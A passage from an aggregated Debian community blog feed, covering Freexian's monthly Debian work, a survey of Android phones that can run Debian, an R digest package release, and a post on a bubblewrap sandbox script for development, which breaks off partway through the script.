<p><a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/">The PinePhonePro is an OK phone made to open standards but it’s hardware isn’t as good as Android phones released in the same year [17]</a>. I’ve got some useful stuff done on mine, but the battery life is a major issue and the screen resolution is low. The <a href="https://etbe.coker.com.au/2022/03/19/more-librem5/">Librem 5 phone from Purism has a better hardware design for security with switches to disable functionality [18]</a>, but it’s even slower than the PinePhonePro. These are good devices for test and development but not ones that many people would be excited to use every day.</p>
<p>Wwan hardware (for accessing the phone network) in M.2 form factor can be obtained for free if you have access to old/broken laptops. Such devices start at about $35 if you want to buy one. USB GPS devices also start at about $35 so probably not worth getting if you can get a wwan device that does GPS as well.</p>
<h2>What We Must Do</h2>
<p>Debian appears to have some voice input software in the pocketsphinx package but no documentation on how it’s to be used. This would be a good thing to document, I spent 15 mins looking at it and couldn’t get it going.</p>
<p>To take advantage of the hardware features in phones we need software support and we ideally don’t want free software to lag too far behind proprietary software – which IMHO means the typical Android setup for phones/tablets.</p>
<p>Support for changing screen resolution is already there as is support for touch screens. Support for adapting the GUI to changed screen size is something that needs to be done – even today’s hardware of connecting a small laptop to an external monitor doesn’t have the ideal functionality for changing the UI. There also seem to be some limitations in touch screen support with multiple screens, I haven’t investigated this properly yet, it definitely doesn’t work in an expected manner in Ubuntu 22.04 and I haven’t yet tested the combinations on Debian/Unstable.</p>
<p>ML is becoming a big thing and it has some interesting use cases for small devices where a smart device can compensate for limited input options. There’s a lot of work that needs to be done in this area and we are limited by the fact that we can’t just rip off the work of other people for use as training data in the way that corporations do.</p>
<p>Security is more important for devices that are at high risk of theft. The vast majority of free software installations are way behind Android in terms of security and we need to address that. I have some ideas for improvement but there is always a conflict between security and usability and while Android is usable for it’s own special apps it’s not usable in a “I want to run applications that use any files from any other applicationsin any way I want” sense. My post about <a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/">Sandboxing Phone apps is relevant for people who are interested in this [19]</a>. We also need to extend security models to cope with things like “ok google” type functionality which has the potential to be a bug and the emerging class of LLM based attacks.</p>
<p>I will write more posts about these thing.</p>
<p>Please write comments mentioning FOSS hardware and software projects that address these issues and also documentation for such things.</p>
<ul>
<li>[1]<a href="https://www.raspberrypi.com/products/raspberry-pi-400/"> https://www.raspberrypi.com/products/raspberry-pi-400/</a></li>
<li>[2]<a href="https://jenson.org/text/"> https://jenson.org/text/</a></li>
<li>[3]<a href="https://www.zdnet.com/article/lenovos-thinkpad-x1-fold-is-the-most-bizarre-fun-and-expensive-laptop-ive-ever-tested/"> http://tinyurl.com/27lrakl6</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Watch"> https://en.wikipedia.org/wiki/Watch</a></li>
<li>[5]<a href="https://en.wikipedia.org/wiki/Calculator_watch"> https://en.wikipedia.org/wiki/Calculator_watch</a></li>
<li>[6]<a href="https://www.notebookcheck.net/Huawei-and-Samsung-reportedly-launching-foldable-tablets-onto-the-market-soon-while-Oppo-and-Vivo-are-pulling-out.803325.0.html"> http://tinyurl.com/27gb7zrq</a></li>
<li>[7]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[8]<a href="https://www.theverge.com/2024/1/9/24030667/rabbit-r1-ai-action-model-price-release-date"> http://tinyurl.com/yuurhkvm</a></li>
<li>[9]<a href="https://www.theverge.com/2023/11/8/23953022/humane-ai-pin-price-specs-leak"> http://tinyurl.com/ytmw42bt</a></li>
<li>[10]<a href="https://www.aliexpress.com/store/1103322555"> https://www.aliexpress.com/store/1103322555</a></li>
<li>[11]<a href="https://en.wikipedia.org/wiki/Apple_Vision_Pro"> https://en.wikipedia.org/wiki/Apple_Vision_Pro</a></li>
<li>[12]<a href="https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/"> https://etbe.coker.com.au/2011/10/28/desktop-augmented-reality/</a></li>
<li>[13]<a href="https://www.aliexpress.com/item/1005005999353358.html"> https://www.aliexpress.com/item/1005005999353358.html</a></li>
<li>[14]<a href="https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/"> https://etbe.coker.com.au/2024/01/29/thinkpad-x1-yoga-gen3/</a></li>
<li>[15]<a href="https://etbe.coker.com.au/2023/10/21/more-about-pinetime/"> https://etbe.coker.com.au/2023/10/21/more-about-pinetime/</a></li>
<li>[16]<a href="https://www.raspberrypi.com/news/how-to-build-your-own-raspberry-pi-watch/"> http://tinyurl.com/24myjjqn</a></li>
<li>[17]<a href="https://etbe.coker.com.au/2023/10/11/pinephone-status/"> https://etbe.coker.com.au/2023/10/11/pinephone-status/</a></li>
<li>[18]<a href="https://etbe.coker.com.au/2022/03/19/more-librem5/"> https://etbe.coker.com.au/2022/03/19/more-librem5/</a></li>
<li>[19]<a href="https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/"> https://etbe.coker.com.au/2023/07/08/sandboxing-phone-apps/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/31/my-ideal-mobile-phone/" rel="bookmark" title="My Ideal Mobile Phone">My Ideal Mobile Phone</a> <small>Based on my experience testing the IBM Seer software on...</small></li>
<li><a href="https://etbe.coker.com.au/2023/06/01/desktop-computers-sense/" rel="bookmark" title="Do Desktop Computers Make Sense?">Do Desktop Computers Make Sense?</a> <small>Laptop vs Desktop Price Currently the smaller and cheaper USB-C...</small></li>
<li><a href="https://etbe.coker.com.au/2009/10/18/mobile-phones-are-computers/" rel="bookmark" title="Mobile Phones Are Computers">Mobile Phones Are Computers</a> <small>One thing I noticed when I got my new LG...</small></li>
</ol>
</div>etbehttps://etbe.coker.com.auDebian Contributions: Upcoming Improvements to Salsa CI, /usr-move, packaging simplemonitor, and more! (by Utkarsh Gupta)https://www.freexian.com/blog/debian-contributions-02-2024/2024-03-13T00:00:00+00:00<p><a href="https://www.freexian.com/about/debian-contributions/">Contributing to Debian</a>
is part of <a href="https://www.freexian.com/about/">Freexian’s mission</a>. This article
covers the latest achievements of Freexian and their collaborators. All of this
is made possible by organizations subscribing to our
<a href="https://www.freexian.com/lts/">Long Term Support contracts</a> and
<a href="https://www.freexian.com/services/">consulting services</a>.</p>
<h2 id="usr-move-by-helmut-grohne">/usr-move, by Helmut Grohne</h2>
<p>Much of the work was spent on handling interaction with time time64 transition
and sending patches for mitigating fallout. The set of packages relevant to
<code>debootstrap</code> is mostly converted and the patches for <code>glibc</code> and <code>base-files</code>
have been refined due to feedback from the upload to Ubuntu noble. Beyond this,
he sent patches for all remaining packages that cannot move their files with
<code>dh-sequence-movetousr</code> and packages using <code>dpkg-divert</code> in ways that <code>dumat</code>
would not recognize.</p>
<h2 id="upcoming-improvements-to-salsa-ci-by-santiago-ruano-rincón">Upcoming improvements to Salsa CI, by Santiago Ruano Rincón</h2>
<p>Last month, Santiago Ruano Rincón started the work on integrating sbuild into
the Salsa CI pipeline. Initially, Santiago used sbuild with the <code>unshare</code>
chroot mode. However, after discussion with josch, jochensp and helmut (thanks
to them!), it turns out that the unshare mode is not the most suitable for the
pipeline, since the level of isolation it provides is not needed, and some test
suites would fail (eg: krb5). Additionally, one of the requirements of the
build job is the use of ccache, since it is needed by some C/C++ large projects
to reduce the compilation time. In the preliminary work with unshare last
month, it was not possible to make ccache to work.</p>
<p>Finally, Santiago changed the chroot mode, and now has a couple of POC (cf:
<a href="https://salsa.debian.org/santiago/pipeline/-/tree/sbuild-schroot?ref_type=heads">1</a>
and <a href="https://salsa.debian.org/santiago/pipeline/-/commits/sbuild-sudo">2</a>)
that rely on the <code>schroot</code> and <code>sudo</code>, respectively. And the good news is that
ccache is successfully used by sbuild with schroot!</p>
<img src="https://www.freexian.com/images/debian-funding-february-salsaci.png" style="float: right;" />
<p>The image here comes from an example of building <code>grep</code>. At the end of the
build, <code>ccache -s</code> shows the statistics of the cache that it used, and so a
little more than half of the calls of that job were cacheable. The most
important pieces are in place to finish the integration of sbuild into the
pipeline.</p>
<p>Other than that, Santiago also reviewed the very useful
<a href="https://salsa.debian.org/salsa-ci-team/pipeline/-/merge_requests/346">merge request !346</a>,
made by IOhannes zmölnig to autodetect the release from debian/changelog. As
agreed with IOhannes, Santiago is preparing a merge request to include the
release autodetection use case in the very own Salsa CI’s CI.</p>
<h2 id="packaging-simplemonitor-by-carles-pina-i-estany">Packaging simplemonitor, by Carles Pina i Estany</h2>
<p>Carles started using <a href="https://simplemonitor.readthedocs.io/">simplemonitor</a> in
2017, opened a
<a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016113">WNPP bug</a> in 2022
and started packaging simplemonitor dependencies in October 2023. After
packaging five direct and indirect dependencies, Carles finally uploaded
simplemonitor to unstable in February.</p>
<p>During the packaging of simplemonitor, Carles reported
<a href="https://github.com/jamesoff/simplemonitor/issues?q=is%3Aissue+author%3Acpina+created%3A2024-01-01..2024-03-01">a few issues</a>
to upstream. Some of these were to make the simplemonitor package build and run
tests reproducibly. A reproducibility issue was reprotest overriding the
timezone, which broke simplemonitor’s tests. There have been discussions on
resolving this upstream in simplemonitor and
<a href="https://salsa.debian.org/reproducible-builds/reprotest/-/issues/11">in reprotest</a>,
too.</p>
<p>Carles also started upgrading or improving some of simplemonitor’s dependencies.</p>
<h2 id="miscellaneous-contributions">Miscellaneous contributions</h2>
<ul>
<li>Stefano Rivera spent some time doing admin on debian.social infrastructure.
Including dealing with a spike of abuse on the Jitsi server.</li>
<li>Stefano started to prepare a new release of dh-python, including cleaning out
a lot of old Python 2.x related code. Thanks to Niels Thykier (outside
Freexian) for spear-heading this work.</li>
<li>DebConf 24 planning is beginning. Stefano discussed venues and finances with
the local team and remotely supported a site-visit by Nattie (outside
Freexian).</li>
<li>Also in the DebConf 24 context, Santiago took part in discussions and
preparations related to the Content Team.</li>
<li>A <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1062460">JIT bug</a> was
reported against pypy3 in Debian Bookworm. Stefano bisected the upstream
history to find the patch (it was already resolved upstream) and released an
update to pypy3 in bookworm.</li>
<li>Enrico participated in /usr-merge discussions with Helmut.</li>
<li>Colin Watson backported a
<a href="https://bugs.debian.org/1027387">python-channels-redis fix</a> to bookworm,
rediscovered while working on
<a href="https://freexian-team.pages.debian.net/debusine/">debusine</a>.</li>
<li>Colin dug into a cluster of celery build failures and tracked the hardest bit
down to a <a href="https://bugs.debian.org/1063345">Python 3.12 regression</a>, now
fixed in unstable. celery should be back in testing once the 64-bit time_t
migration is out of the way.</li>
<li>Thorsten Alteholz uploaded a new upstream version of cpdb-libs. Unfortunately
upstream changed the naming of their release tags, so updating the watch file
was a bit demanding. Anyway this version 2.0 is a huge step towards
introduction of the new Common Print Dialog Backends.</li>
<li>Helmut send patches for 48 cross build failures.</li>
<li>Helmut changed debvm to use mkfs.ext4 instead of genext2fs.</li>
<li>Helmut sent a
<a href="https://salsa.debian.org/ci-team/debci/-/merge_requests/271">debci MR</a>
for improving collector robustness.</li>
<li>In preparation for DebConf 25, Santiago worked on the Brest Bid.</li>
</ul>Utkarsh Guptahttps://www.freexian.com/tags/planet-debian/Android vs FOSS Phoneshttps://etbe.coker.com.au/?p=54582024-03-12T10:35:41+00:00<p>To achieve my aims regarding <a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/">Convergence of mobile phone and PC [1]</a> I need something a big bigger than the 4G of RAM that’s in the <a href="https://en.wikipedia.org/wiki/PinePhone_Pro">PinePhone Pro [2]</a>. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.</p>
<h2>PostmarketOS</h2>
<p>One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the <a href="https://wiki.postmarketos.org/wiki/Devices">PostmarketOS Wiki page of supported devices [3]</a> was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.</p>
<h2>LineageOS</h2>
<p>The <a href="https://en.wikipedia.org/wiki/Libhybris">libhybris libraries are a compatibility layer between Android and glibc programs [4]</a>. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>External Display</th>
<th>Price</th>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/pstar/">Edge 20 Pro [5]</a></td>
<td>6-12G</td>
<td>HDMI</td>
<td>$500 not many on sale</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nio/variant1/">Edge S aka moto G100 [6]</a></td>
<td>6-8G</td>
<td>HDMI</td>
<td>$500 to $600+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/FP4/">Fairphone 4</a></td>
<td>6-8G</td>
<td>USBC-DP</td>
<td>$1000+</td>
</tr>
<tr>
<td><a href="https://wiki.lineageos.org/devices/nx659j/variant1/">Nubia Red Magic 5G</a></td>
<td>8-16G</td>
<td>USBC-DP</td>
<td>$600+</td>
</tr>
</tbody></table>
<p>The <a href="https://wiki.lineageos.org/devices/">LineageOS device search page [9]</a> allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the <a href="https://www.kernel.org/category/releases.html">kernel.org supported release list [10]</a>. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.</p>
<p><a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/">Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]</a>. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.</p>
<h2>IP Laws and Practices</h2>
<p><a href="https://www.bunniestudios.com/blog/?p=4297">Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]</a>. This is a major factor in the lack of support for FOSS on phones and other devices.</p>
<h2>Droidian and Buying a Note 9</h2>
<p>The FOSDEM 2023 has <a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/">a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]</a>. It’s interesting how they use containers for the necessary Android apps. Here is the <a href="https://devices.droidian.org/">list of devices supported by Droidian [14]</a>.</p>
<p>Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from <a href="https://volla.online/en/">Volla – a company dedicated to making open Android based devices [15]</a>. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.</p>
<table>
<tbody><tr>
<th>Phone</th>
<th>RAM</th>
<th>Price</th>
<th>Issues</th>
</tr>
<tr>
<td>Note 9 128G/512G</td>
<td>6G/8G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Galaxy S9+</td>
<td>6G</td>
<td><$300</td>
<td>Not supporting external display</td>
</tr>
<tr>
<td>Xperia 5</td>
<td>6G</td>
<td>>$300</td>
<td>Hotspot partly working</td>
</tr>
<tr>
<td>OnePlus 3T</td>
<td>6G</td>
<td>$200 – $400+</td>
<td>photos not working</td>
</tr>
</tbody></table>
<p>I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.</p>
<h2>Mobian</h2>
<p>I should have checked the Mobian list first as it’s the main Debian variant for phones.</p>
<p>From the <a href="https://wiki.debian.org/Mobian/Devices">Mobian Devices list [16]</a> the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The <a href="https://shop.shiftphones.com/shift6mq.html">Shift6mq is made by a German company with similar aims to the Fairphone [17]</a>, it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.</p>
<h2>Smart Watches</h2>
<p>The same issues apply to smart watches. <a href="https://asteroidos.org/watches/">AstereoidOS is a free smart phone OS designed for closed hardware [18]</a>. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.</p>
<ul>
<li>[1]<a href="https://etbe.coker.com.au/2023/05/29/considering-convergence/"> https://etbe.coker.com.au/2023/05/29/considering-convergence/</a></li>
<li>[2]<a href="https://en.wikipedia.org/wiki/PinePhone_Pro"> https://en.wikipedia.org/wiki/PinePhone_Pro</a></li>
<li>[3]<a href="https://wiki.postmarketos.org/wiki/Devices"> https://wiki.postmarketos.org/wiki/Devices</a></li>
<li>[4]<a href="https://en.wikipedia.org/wiki/Libhybris"> https://en.wikipedia.org/wiki/Libhybris</a></li>
<li>[5]<a href="https://wiki.lineageos.org/devices/pstar/"> https://wiki.lineageos.org/devices/pstar/</a></li>
<li>[6]<a href="https://wiki.lineageos.org/devices/nio/variant1/"> https://wiki.lineageos.org/devices/nio/variant1/</a></li>
<li>[7]<a href="https://wiki.lineageos.org/devices/FP4/"> https://wiki.lineageos.org/devices/FP4/</a></li>
<li>[8]<a href="https://wiki.lineageos.org/devices/nx659j/variant1/"> https://wiki.lineageos.org/devices/nx659j/variant1/</a></li>
<li>[9]<a href="https://wiki.lineageos.org/devices/"> https://wiki.lineageos.org/devices/</a></li>
<li>[10]<a href="https://www.kernel.org/category/releases.html"> https://www.kernel.org/category/releases.html</a></li>
<li>[11]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3362-open-source-for-sustainable-and-long-lasting-phones/"> https://tinyurl.com/ykdbxf4a</a></li>
<li>[12]<a href="https://www.bunniestudios.com/blog/?p=4297"> https://www.bunniestudios.com/blog/?p=4297</a></li>
<li>[13]<a href="https://fosdem.org/2024/schedule/event/fosdem-2024-3165-droidian-bridging-the-gap-between-various-platforms-with-convergence/"> https://tinyurl.com/29jfaw4f</a></li>
<li>[14]<a href="https://devices.droidian.org/"> https://devices.droidian.org/</a></li>
<li>[15]<a href="https://volla.online/en/"> https://volla.online/en/</a></li>
<li>[16]<a href="https://wiki.debian.org/Mobian/Devices"> https://wiki.debian.org/Mobian/Devices</a></li>
<li>[17]<a href="https://shop.shiftphones.com/shift6mq.html"> https://shop.shiftphones.com/shift6mq.html</a></li>
<li>[18]<a href="https://asteroidos.org/watches/"> https://asteroidos.org/watches/</a></li>
</ul>
<div class="yarpp yarpp-related yarpp-related-rss yarpp-template-list">
<p>Related posts:</p><ol>
<li><a href="https://etbe.coker.com.au/2010/01/27/australian-open-android-seer/" rel="bookmark" title="The Australian Open and Android Phones (Seer)">The Australian Open and Android Phones (Seer)</a> <small>On Monday the 25th of January 2010 I visited the...</small></li>
<li><a href="https://etbe.coker.com.au/2011/10/27/dual-sim-amaysim-contract/" rel="bookmark" title="Dual SIM Phones vs Amaysim vs Contract for Mobile Phones">Dual SIM Phones vs Amaysim vs Contract for Mobile Phones</a> <small>Currently Dick Smith is offering two dual-SIM mobile phones for...</small></li>
<li><a href="https://etbe.coker.com.au/2022/12/15/pixel-6a/" rel="bookmark" title="Pixel 6A">Pixel 6A</a> <small>I have just bought a Pixel 6A [1] for my...</small></li>
</ol>
</div>etbehttps://etbe.coker.com.audigest 0.6.35 on CRAN: New xxhash codehttp://dirk.eddelbuettel.com/blog/2024/03/11#digest_0.6.352024-03-11T23:23:00+00:00<p>Release 0.6.35 of the <a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a> package
arrived at <a href="https://cran.r-project.org">CRAN</a> today and has
also been uploaded to <a href="https://www.debian.org">Debian</a>
already.</p>
<p><a href="https://dirk.eddelbuettel.com/code/digest.html">digest</a>
creates hash digests of arbitrary R objects. It can use a number
different hashing algorithms (<code>md5</code>, <code>sha-1</code>,
<code>sha-256</code>, <code>sha-512</code>, <code>crc32</code>,
<code>xxhash32</code>, <code>xxhash64</code>, <code>murmur32</code>,
<code>spookyhash</code>, <code>blake3</code>,<code>crc32c</code> – and
now also <code>xxh3_64</code> and <code>xxh3_128</code>), and enables
easy comparison of (potentially large and nested) R language objects as
it relies on the native serialization in R. It is a mature and
widely-used package (with 65.8 million downloads just on the partial
cloud mirrors of CRAN which keep logs) as many tasks may involve
<em>caching</em> of objects for which it provides convenient
general-purpose hash key generation to quickly identify the various
objects.</p>
<p>This release updates the included <a href="https://github.com/Cyan4973/xxHash">xxHash</a> version to the
current verion 0.8.2 updating the existing <code>xxhash32</code> and
<code>xxhash64</code> hash functions — and also adding the newer
<code>xxh3_64</code> and <code>xxh3_128</code> ones. We have a project
at work using <code>xxh3_128</code> from Python which made me realize
having it from R would be nice too, and given the existing
infrastructure in the package actually doing so was fairly quick and
straightforward.</p>
<p>My <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>
provides a summary of changes to the <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/11/#digest_0.6.35">previous
version</a>. For questions or comments use the <a href="https://github.com/eddelbuettel/digest/issues">issue tracker</a>
off the <a href="https://github.com/eddelbuettel/digest">GitHub
repo</a>. For documentation (including the <a href="https://eddelbuettel.github.io/digest/changelog/">changelog</a>)
see the <a href="https://eddelbuettel.github.io/digest/">documentation
site</a>.</p>
<p>If you like this or other open-source work I do, you can now <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>Dirk Eddelbuettelhttp://dirk.eddelbuettel.com/blogConvenient sandboxed development environmenthttps://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment2024-03-11T20:39:58+00:00<p>I like using one machine and setup for everything, from serious development work to hobby projects to managing my finances. This is very convenient, as often the lines between these are blurred. But it is also scary if I think of the large number of people who I have to trust to not want to extract all my personal data. Whenever I run a <code>cabal install</code>, or a fun VSCode extension gets updated, or anything like that, I am running code that could be malicious or buggy.</p>
<p>In a way it is surprising and reassuring that, as far as I can tell, this commonly does not happen. Most open source developers out there seem to be nice and well-meaning, after all.</p>
<h3 id="convenient-or-it-wont-happen">Convenient or it won’t happen</h3>
<p>Nevertheless I thought I should do something about this. The safest option would probably to use dedicated virtual machines for the development work, with very little interaction with my main system. But knowing me, that did not seem likely to happen, as it sounded like a fair amount of hassle. So I aimed for a viable compromise between security and convenient, and one that does not get too much in the way of my current habits.</p>
<p>For instance, it seems desirable to have the project files accessible from my unconstrained environment. This way, I could perform certain actions that need access to secret keys or tokens, but are (unlikely) to run code (e.g. <code>git push</code>, <code>git pull</code> from private repositories, <code>gh pr create</code>) from “the outside”, and the actual build environment can do without access to these secrets.</p>
<p>The user experience I thus want is a quick way to enter a “development environment” where I can do most of the things I need to do while programming (network access, running command line and GUI programs), with access to the current project, but without access to my actual <code>/home</code> directory.</p>
<p>I initially followed the blog post <a href="https://msucharski.eu/posts/application-isolation-nixos-containers/">“Application Isolation using NixOS Containers” by Marcin Sucharski</a> and got something working that mostly did what I wanted, but then a colleague pointed out that tools like <a href="https://github.com/netblue30/firejail"><code>firejail</code></a> can achieve roughly the same with a less “global” setup. I tried to use <code>firejail</code>, but found it to be a bit too inflexible for my particular whims, so I ended up writing a small wrapper around the lower level sandboxing tool <a href="https://www.joachim-breitner.de/blog/tag/Bubblewrap">https://github.com/containers/bubblewrap</a>.</p>
<h3 id="selective-bubblewrapping">Selective bubblewrapping</h3>
<p>This script, called <code>dev</code> and included below, builds a new filesystem namespace with minimal <code>/proc</code> and <code>/dev</code> directories, it’s own <code>/tmp</code> directories. It then binds-mound some directories to make the host’s NixOS system available inside the container (<code>/bin</code>, <code>/usr</code>, the nix store including domain socket, stuff for OpenGL applications). My user’s home directory is taken from <code>~/.dev-home</code> and some configuration files are bind-mounted for convenient sharing. I intentionally don’t share most of the configuration – for example, a <code>direnv enable</code> in the dev environment should not affect the main environment. The X11 socket for graphical applications and the corresponding <code>.Xauthority</code> file is made available. And finally, if I run <code>dev</code> in a project directory, this project directory is bind mounted writable, and the current working directory is preserved.</p>
<p>The effect is that I can type <code>dev</code> on the command line to enter “dev mode” rather conveniently. I can run development tools, including graphical ones like VSCode, and especially the latter with its extensions is part of the sandbox. To do a <code>git push</code> I either exit the development environment (Ctrl-D) or open a separate terminal. Overall, the inconvenience of switching back and forth seems worth the extra protection.</p>
<p>Clearly, isn’t going to hold against a determined and maybe targeted attacker (e.g. access to the X11 and the nix daemon socket can probably be used to escape easily). But I hope it will help against a compromised dev dependency that just deletes or exfiltrates data, like keys or passwords, from the usual places in <code>$HOME</code>.</p>
<h3 id="rough-corners">Rough corners</h3>
<p>There is more polishing that could be done.</p>
<ul>
<li><p>In particular, clicking on a link inside VSCode in the container will currently open Firefox inside the container, without access to my settings and cookies etc. Ideally, links would be opened in the Firefox running outside. This is a problem that has a solution in the world of applications that are sandboxed with Flatpak, and involves a bunch of moving parts (a <a href="https://github.com/flatpak/xdg-desktop-portal">xdg-desktop-portal</a> user service, a <a href="https://github.com/flatpak/xdg-dbus-proxy">filtering dbus proxy</a>, exposing access to that proxy in the container). I experimented with that for a bit longer than I should have, but could not get it to work to satisfaction (even without a container involved, I could not get <code>xdg-desktop-portal</code> to heed my default browser settings…). For now I will live with manually copying and pasting URLs, we’ll see how long this lasts.</p></li>
<li><p>With this setup (and unlike the NixOS container setup I tried first), the same applications are installed inside and outside. It might be useful to separate the set of installed programs: There is simply no point in running <code>evolution</code> or <code>firefox</code> inside the container, and if I do not even have VSCode or <code>cabal</code> available outside, so that it’s less likely that I forget to enter <code>dev</code> before using these tools.</p>
<p>It shouldn’t be too hard to cargo-cult some of the NixOS Containers infrastructure to be able to have a separate system configuration that I can manage as part of my normal system configuration and make available to <code>bubblewrap</code> here.</p></li>
</ul>
<p>So likely I will refine this some more over time. Or get tired of typing <code>dev</code> and going back to what I did before…</p>
<h3 id="the-script">The script</h3>
<details>
The <code>dev</code> script (at the time of writing)
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb1-1"><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1"><span class="co">#!/usr/bin/env bash</span></a></span><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-1" tabindex="-1">
<span id="cb1-2"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-2" tabindex="-1">
<span id="cb1-3"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-3" tabindex="-1"><span class="va">extra</span><span class="op">=</span><span class="va">()</span>
<span id="cb1-4"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-4" tabindex="-1"><span class="cf">if</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/build/<span class="pp">*</span> <span class="kw">]]</span> <span class="kw">||</span> <span class="kw">[[</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="ot">==</span> /home/jojo/projekte/programming/<span class="pp">*</span> <span class="kw">]]</span>
<span id="cb1-5"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-5" tabindex="-1"><span class="cf">then</span>
<span id="cb1-6"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-6" tabindex="-1"><span class="va">extra</span><span class="op">+=</span><span class="va">(</span>--bind <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span> --chdir <span class="st">"</span><span class="va">$PWD</span><span class="st">"</span><span class="va">)</span>
<span id="cb1-7"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-7" tabindex="-1"><span class="cf">fi</span>
<span id="cb1-8"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-8" tabindex="-1">
<span id="cb1-9"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-9" tabindex="-1"><span class="cf">if</span> <span class="bu">[</span> <span class="ot">-n</span> <span class="st">"</span><span class="va">$1</span><span class="st">"</span> <span class="bu">]</span>
<span id="cb1-10"></span></a><a href="https://www.joachim-breitner.de/blog/tag/English_feed.rss#cb1-10" tabindex="-1"><span class="cf">then</span>
